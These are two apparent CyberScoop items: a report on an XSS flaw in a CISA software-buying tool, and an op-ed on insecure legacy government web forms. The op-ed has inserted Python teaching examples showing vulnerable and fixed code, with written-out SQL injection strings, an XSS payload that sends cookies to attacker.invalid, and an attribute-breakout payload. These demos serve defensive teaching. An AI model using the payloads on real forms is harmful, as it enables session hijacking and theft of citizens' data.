
CISA’s secure-software buying tool had a simple XSS vulnerability of its own

15 January 2026 at 17:47

A Cybersecurity and Infrastructure Security Agency tool dedicated to helping government agencies buy secure software turned out to have a cybersecurity vulnerability of its own.

Jeff Williams, the former leader of the Open Worldwide Application Security Project (OWASP), told CyberScoop that he discovered a cross-site scripting vulnerability in CISA’s “Software Acquisition Guide: Supplier Response Web Tool” and reported it to CISA in September, before it was eventually fixed in December.

The vulnerability involves attackers injecting JavaScript into a web page, then getting that JavaScript to attack other users of that same page, he said. It also could have been used to deface the website, he said.

Williams, co-founder and chief technology officer of the application security firm Contrast Security, said it should have been easy for someone to spot the vulnerability at CISA, since it was the first attack he tried.

“I thought it was a little hypocritical to be promoting secure software development and not do the most basic test you could possibly do,” he said.

When Williams first reported the flaw through a bug bounty program, it was rejected as not critical enough; he later got attention for it through CISA’s Vulnerability Information and Coordination Environment program. The government shutdown contributed to the delay in fixing it, but Williams said the fix should have been about five minutes of work.

Williams said that while there are worse bugs than the one he uncovered, “I have customers that would treat this vulnerability as incredibly serious, because they take their reputation to be one of their most important assets.”

CISA’s role as an evangelist for cybersecurity hasn’t made it immune to cyberattacks. Notably, the agency identified a breach in 2024 that triggered a notification to Congress.

The chief information officer for CISA, Robert Costello, said the agency took action after receiving notification about a potential vulnerability.

“As per protocol, we addressed and patched the vulnerability, ensuring there was no significant risk or known exploitation,” he said in a statement to CyberScoop. “Additionally, our team identified process improvements for future vulnerabilities reported to the agency. As a champion for the CVE [Common Vulnerabilities and Exposures] program, CISA followed the standard coordinated disclosure processes to create a CVE that documents the vulnerability. CISA appreciates the report provided by this security researcher. This is another example of operational collaboration in action.”

The post CISA’s secure-software buying tool had a simple XSS vulnerability of its own appeared first on CyberScoop.

Legacy web forms are the weakest link in government data security

By: Greg Otto
21 November 2025 at 06:00

Federal, state, and local government agencies face a critical vulnerability hiding in plain sight: outdated web forms collecting citizen data through insecure channels. While agencies invest in perimeter security and threat detection, many continue using legacy forms built years ago without modern encryption, authentication, or compliance capabilities. These aging systems collect Social Security numbers, financial records, health information, and security clearance data through technology that cannot meet current federal security standards.

The scope of the problem is substantial. Government agencies allocate 80% of IT budgets to maintaining legacy systems, starving modernization efforts while feeding outdated technology. The federal government’s 10 most critical legacy systems—ranging from 8 to 51 years old—cost $337 million annually to operate and maintain, with total projected spending on legacy systems reaching $2.4 billion by 2030. Meanwhile, government data breaches cost an average of $10.22 million per incident in the United States—the highest globally.

The HTTPS problem that won’t go away

Despite the 2015 federal mandate establishing HTTPS as the baseline for all government websites, implementation gaps persist. The unencrypted HTTP protocol exposes data to interception, manipulation, and impersonation attacks. Attackers positioned on the network can read Social Security numbers, driver’s license numbers, financial account numbers, and login credentials transmitted in plain text. Man-in-the-middle attackers can alter form data during transmission without detection.

Recent federal security assessments reveal ongoing challenges. The Department of Health and Human Services’ information security program rated “Not Effective” for FY 2024—the same rating as FY 2023—based on inability to meet maturity levels for core security functions including Identify, Protect, Detect, Respond, and Recover.

Legacy government web forms that do implement encryption often use outdated protocols that no longer meet regulatory requirements. Older systems still rely on SHA-1-signed certificates and TLS 1.0, both deprecated and vulnerable to known attacks, and neither meets NIST, CJIS, or HIPAA requirements. Without HTTP Strict Transport Security (HSTS), a browser that follows an http:// link or a typed address sends that first request in cleartext, so users can still reach unencrypted form pages and an on-path attacker can intercept or redirect them before any redirect to HTTPS takes effect.
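The two transport checks above, as an added example (not code from the op-ed, Kiteworks, or any agency): a parser that evaluates a Strict-Transport-Security header the way a browser would, flagging the absent, expired, and too-short policies that leave an http:// path open, and a server-side TLS context that refuses TLS 1.0 and 1.1 handshakes. The header sets and the one-year baseline are constructed assumptions for the illustration.

```python
import ssl

# One year in seconds: the common hardening baseline for HSTS max-age
# (also the minimum the browser preload list accepts). An assumption here.
MIN_MAX_AGE = 31536000


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security value the way a browser does.

    Returns {"max-age": int, "includeSubDomains": bool, "preload": bool},
    or None when the header is absent or carries no usable max-age, which
    a browser treats as 'no policy at all'.
    """
    if not header_value:
        return None
    policy = {"max-age": None, "includeSubDomains": False, "preload": False}
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                policy["max-age"] = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            policy["includeSubDomains"] = True
        elif name == "preload":
            policy["preload"] = True
    if policy["max-age"] is None:
        return None
    return policy


def hsts_findings(headers):
    """Return the transport findings for one HTTPS response's headers.

    `headers` maps header name to value (looked up case-insensitively).
    An empty list means the policy meets the baseline used here.
    """
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(value)
    if policy is None:
        return ["no HSTS policy: a plain http:// request to the form is still possible"]
    findings = []
    if policy["max-age"] == 0:
        findings.append("max-age=0 clears any stored policy instead of enforcing one")
    elif policy["max-age"] < MIN_MAX_AGE:
        findings.append(f"max-age {policy['max-age']} is below the one-year baseline")
    if not policy["includeSubDomains"]:
        findings.append("includeSubDomains missing: forms on subdomains stay unprotected")
    return findings


def hardened_tls_context():
    """Server-side context that refuses TLS 1.0 and 1.1 handshakes outright."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def minimum_tls_version_name(ctx):
    """Name of the lowest protocol version the context will negotiate."""
    return ctx.minimum_version.name


# Constructed sample header sets, not captured from any real agency site.
LEGACY_HEADERS = {"Content-Type": "text/html"}
WEAK_HEADERS = {"Strict-Transport-Security": "max-age=300"}
HARDENED_HEADERS = {"Strict-Transport-Security":
                    "max-age=63072000; includeSubDomains; preload"}

if __name__ == "__main__":
    for label, hdrs in (("legacy", LEGACY_HEADERS), ("weak", WEAK_HEADERS),
                        ("hardened", HARDENED_HEADERS)):
        print(label, hsts_findings(hdrs) or "ok")
    print("minimum TLS:", minimum_tls_version_name(hardened_tls_context()))
```

The HSTS check only matters once the page is already served over HTTPS; the browser ignores the header on a plain http:// response, so the redirect to HTTPS still has to exist, and the header then closes the window on every later visit.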

Application-layer vulnerabilities

Beyond transmission security, legacy web forms suffer from fundamental application vulnerabilities that modern platforms address in their design. Testing of government web applications revealed that more than 80% are prone to SQL injection attacks. Unlike private sector organizations that remediate 73% of identified vulnerabilities, government departments remediate only 27%—the lowest among all industry sectors.

SQL injection remains one of the most dangerous attacks against government web forms. Legacy forms that build database queries by concatenating user input into the statement text, rather than using parameterized queries, let an attacker supply input that changes the structure of the query itself. That access can be used to read sensitive records such as national identity information, license details, and Social Security numbers, to alter or delete identity records, to manipulate data in order to forge official documents, or to exfiltrate entire databases of citizen information. As long as queries are assembled by string concatenation, these systems remain exposed.
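The concatenation flaw described above, as an added example that is not from the op-ed or from any agency system: a license-number lookup written the legacy way beside its parameterized replacement, run against an in-memory SQLite table of constructed records. The two attacker inputs are constructed too; the first turns the WHERE clause into a tautology, the second appends a UNION that reads the schema catalogue, which is the first step toward dumping the whole database.

```python
import sqlite3


def seed_db():
    """In-memory table with constructed sample records (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, license_no TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO citizens (license_no, ssn) VALUES (?, ?)",
        [("WA-100001", "123-45-6789"), ("WA-100002", "987-65-4321")],
    )
    return conn


def lookup_vulnerable(conn, license_no):
    """Legacy pattern: the form field is spliced into the statement text,
    so the input can change the query's structure, not just its value."""
    sql = ("SELECT license_no, ssn FROM citizens WHERE license_no = '"
           + license_no + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, license_no):
    """Hardened form: the value travels separately from the statement and is
    compared as data, whatever characters it contains."""
    return conn.execute(
        "SELECT license_no, ssn FROM citizens WHERE license_no = ?",
        (license_no,),
    ).fetchall()


# Constructed attacker inputs typed into the license-number field.
TAUTOLOGY = "' OR '1'='1"
SCHEMA_DUMP = "' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    db = seed_db()
    print("legitimate:", lookup_vulnerable(db, "WA-100001"))
    print("tautology, concatenated:", lookup_vulnerable(db, TAUTOLOGY))
    print("tautology, parameterized:", lookup_parameterized(db, TAUTOLOGY))
    print("schema dump, concatenated:", lookup_vulnerable(db, SCHEMA_DUMP))
    print("schema dump, parameterized:", lookup_parameterized(db, SCHEMA_DUMP))
```

Against the concatenated query the tautology returns every row and the UNION returns the CREATE TABLE statement for `citizens`; the parameterized query returns nothing for either, because the quote and the keywords arrive as part of a value that simply matches no license number.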

Cross-site scripting (XSS) affects 75% of government applications, a higher share than in other industry sectors. XSS on a government web form lets an attacker run script in users’ browsers: capture keystrokes to steal credentials and form data, read session cookies to hijack authenticated sessions, and redirect users to malicious websites. Government healthcare forms are particularly exposed, since XSS there could be used to alter medical information and create fake prescriptions.
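The reflection flaw behind these attacks, as an added example that is not code from the op-ed or from any agency form: a confirmation page that echoes the applicant's name into both a text node and an input attribute, first unescaped and then escaped for both contexts, with two constructed payloads (one a cookie-stealing script, one an attribute breakout). The response headers in `hardened_headers` are an assumed defence-in-depth layer, not something the op-ed prescribes.

```python
import html


def render_unsafe(value):
    """Legacy template: the submitted value is pasted straight into the page,
    once as text and once inside a quoted attribute."""
    return ('<p>Application received for: ' + value + '</p>\n'
            '<input type="text" name="applicant" value="' + value + '">')


def render_safe(value):
    """Hardened template: the value is HTML-escaped before interpolation.
    quote=True also turns the quote characters into entities, which is what
    keeps the attribute context closed."""
    escaped = html.escape(value, quote=True)
    return ('<p>Application received for: ' + escaped + '</p>\n'
            '<input type="text" name="applicant" value="' + escaped + '">')


def hardened_headers(session_id):
    """Defence in depth for the same page: a CSP that refuses inline script,
    and a session cookie that script cannot read even if an XSS slips through."""
    return {
        "Content-Security-Policy":
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
        "Set-Cookie": f"session={session_id}; Secure; HttpOnly; SameSite=Lax",
    }


# Constructed payloads; the host uses the reserved .invalid TLD.
BODY_PAYLOAD = ("<script>new Image().src='https://attacker.invalid/?c='"
                "+document.cookie</script>")
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'

if __name__ == "__main__":
    print("--- unsafe, text context ---\n" + render_unsafe(BODY_PAYLOAD))
    print("--- safe, text context ---\n" + render_safe(BODY_PAYLOAD))
    print("--- unsafe, attribute context ---\n" + render_unsafe(ATTR_PAYLOAD))
    print("--- safe, attribute context ---\n" + render_safe(ATTR_PAYLOAD))
    print(hardened_headers("example-session-id"))
```

The attribute payload is the one legacy code most often misses: escaping only `<` and `>` stops the script tag but still lets `"` close the `value` attribute and add an `onfocus` handler, which is why the escaping has to be chosen for the context the value lands in.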

Legacy forms also lack protection against cross-site request forgery (CSRF), in which an attacker’s page causes an authenticated government user’s browser to submit requests the user never intended. Modern secure forms issue a unique, unpredictable anti-CSRF token per session, embed it in each form, and validate it server-side before processing the request; legacy forms have no such check.
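The synchronizer-token pattern just described, as an added example that is not code from the op-ed or from any agency platform: a minimal session store that mints one unguessable token per session, a form that carries it as a hidden field, and a submit handler that rejects a request whose token is missing, belongs to a different session, or arrives without a valid session cookie. Request cookies and form bodies are modelled as plain dicts, an assumption made to keep the example framework-free.

```python
import hmac
import secrets


class SessionStore:
    """Server-side sessions keyed by an unguessable cookie value; each session
    gets its own unguessable anti-CSRF token when it is created."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"csrf": secrets.token_urlsafe(32)}
        return sid

    def csrf_token(self, sid):
        session = self._sessions.get(sid)
        return session["csrf"] if session else None


def render_form(store, sid):
    """Embed the session's token as a hidden field. A page on another origin
    cannot read this markup, so a forged submission cannot include the token."""
    return (
        '<form method="POST" action="/submit">\n'
        f'  <input type="hidden" name="csrf_token" value="{store.csrf_token(sid)}">\n'
        '  <input type="text" name="ssn">\n'
        '</form>'
    )


def handle_submit(store, cookies, form):
    """Validate the token before touching any submitted data.

    `cookies` and `form` are dicts standing in for the request's Cookie
    header and POST body. Returns (status, message).
    """
    sid = cookies.get("session")
    expected = store.csrf_token(sid)
    if expected is None:
        return 403, "no valid session"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison on bytes: compare_digest rejects non-ASCII str,
    # and attacker-controlled input may contain anything.
    if not hmac.compare_digest(submitted.encode("utf-8"), expected.encode("utf-8")):
        return 403, "csrf token missing or invalid"
    return 200, "accepted"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.new_session()
    token = store.csrf_token(sid)
    print(render_form(store, sid))
    # Legitimate submission from the rendered form.
    print(handle_submit(store, {"session": sid}, {"csrf_token": token, "ssn": "000-00-0000"}))
    # Forged cross-site POST: the browser attaches the cookie, the attacker has no token.
    print(handle_submit(store, {"session": sid}, {"ssn": "000-00-0000"}))
    # A token from the attacker's own session does not transfer.
    other = store.new_session()
    print(handle_submit(store, {"session": sid}, {"csrf_token": store.csrf_token(other)}))
```

Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer, but it is not a substitute: the token check is what works regardless of browser version and of how the cross-site request was triggered.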

Compliance gap

Federal agencies must comply with the Federal Information Security Modernization Act (FISMA), which requires implementation of NIST SP 800-53 security controls including access control, configuration management, identification and authentication, and system and communications protection. Legacy web forms fail FISMA compliance when they cannot implement modern encryption for data in transit and at rest, lack multi-factor authentication capabilities, don’t maintain comprehensive audit logs, use unsupported software without security patches, and operate with known exploitable vulnerabilities.

The Treasury Inspector General for Tax Administration (TIGTA) found IRS platforms exhibit insufficient vulnerability scanning and remediation, inadequate configuration controls, and systems lacking modern protection capabilities. Critical and high vulnerabilities on IRS servers ranged from days to months overdue for remediation, with applications requiring protection lacking proper safeguards.

Federal agencies using third-party web form platforms must ensure these vendors have appropriate FedRAMP authorization. FedRAMP requires security controls compliance incorporating NIST SP 800-53 Revision 5 controls, impact level authorization based on data sensitivity, and continuous monitoring of encryption methods and security posture. Legacy government web forms implemented through non-FedRAMP-authorized platforms, consumer-grade SaaS tools, or on-premises systems without proper security assessments represent unauthorized use of non-compliant systems.

All 50 states have data breach notification laws requiring organizations to notify affected individuals when personally identifiable information is compromised. Legacy web forms create notification violations through inability to detect breaches, unknown breach scope without audit trails, missed notification deadlines, and unclear encryption status that affects notification exemptions.

Real-world transmission failures

The gap between policy and practice is stark. Federal agencies including GSA, DoD, and DOE labs require contractors to submit forms with Social Security numbers, dates of birth, driver’s license numbers, criminal histories, and credit information via standard non-encrypted email as plain PDF attachments. When contractors offer encrypted alternatives like Microsoft OME, password-protected files, or secure links, badge offices respond with “That’s how we’ve always done it and that’s the only way we’ll do it.”

Most federal agencies lack basic secure portals for PII submission, forcing reliance on email despite DoD and GSA policies requiring PII transmitted outside internal mail systems to be encrypted. Standard Form 86 for national security clearances and other government forms are distributed as fillable PDFs that can be completed offline, saved unencrypted, and transmitted through insecure channels—despite containing complete background investigation data for millions of federal employees and contractors.

Recent breaches highlight ongoing vulnerabilities in government data systems. The U.S. Treasury Department suffered a 2024 breach when hackers accessed its unclassified network through a compromised software key, exposing internal documents about U.S. financial operations. Earlier this month, the Congressional Budget Office was hacked by a suspected foreign actor, potentially exposing key financial research. DISA Global Solutions, a Texas-based provider of employee screening services including background checks, confirmed in February 2025 a massive data breach affecting more than 3.3 million people, exposing Social Security numbers, financial information, and government-issued identity documents—with unauthorized access lasting over two months before detection.

Tax forms pose significant security risks because many IRS applications are extremely outdated—some over 60 years old and written in COBOL and Assembler. A recent report found 231 IRS IT systems are legacy systems with critical security vulnerabilities. Web forms collecting taxpayer PII including Social Security numbers, income details, banking information, and tax filings are transmitted through these vulnerable legacy platforms.

What agencies must do now

Government agencies must immediately enforce HTTPS encryption for all web form pages using HSTS, deploy server-side input validation to prevent SQL injection and XSS attacks, implement anti-CSRF tokens for each form session, add CAPTCHA and bot protection, enable comprehensive access logging, and conduct regular vulnerability scanning for OWASP Top 10 vulnerabilities.

Long-term security requires replacing legacy forms with FedRAMP-authorized platforms that encrypt data at rest with AES-256 and in transit with TLS 1.3, provide multi-factor authentication for both citizens and government staff, role-based access control with granular permissions, comprehensive audit trails capturing all data access events, automated security updates addressing emerging vulnerabilities, and digital workflow automation eliminating manual processes.

Agencies should also consolidate forms into centralized platforms rather than managing dozens of disconnected form tools, creating unified security policies, consistent user experiences, and simplified compliance management.

The real question is not whether government agencies can afford to modernize outdated web forms, but whether they can afford the consequences of failing to do so. Every unencrypted submission, each SQL injection vulnerability, and each missing audit trail represents citizen data at risk and regulatory violations accumulating. Federal mandates established the security standards years ago. Implementation can no longer wait.

Frank Balonis is chief information security officer and senior vice president of operations and support at Kiteworks, with more than 20 years of experience in IT support and services.

Update, 11/23/2025, 2:20 p.m.: This op-ed incorrectly described the way the state of Washington’s MFA system operated. We regret the error.

The post Legacy web forms are the weakest link in government data security appeared first on CyberScoop.
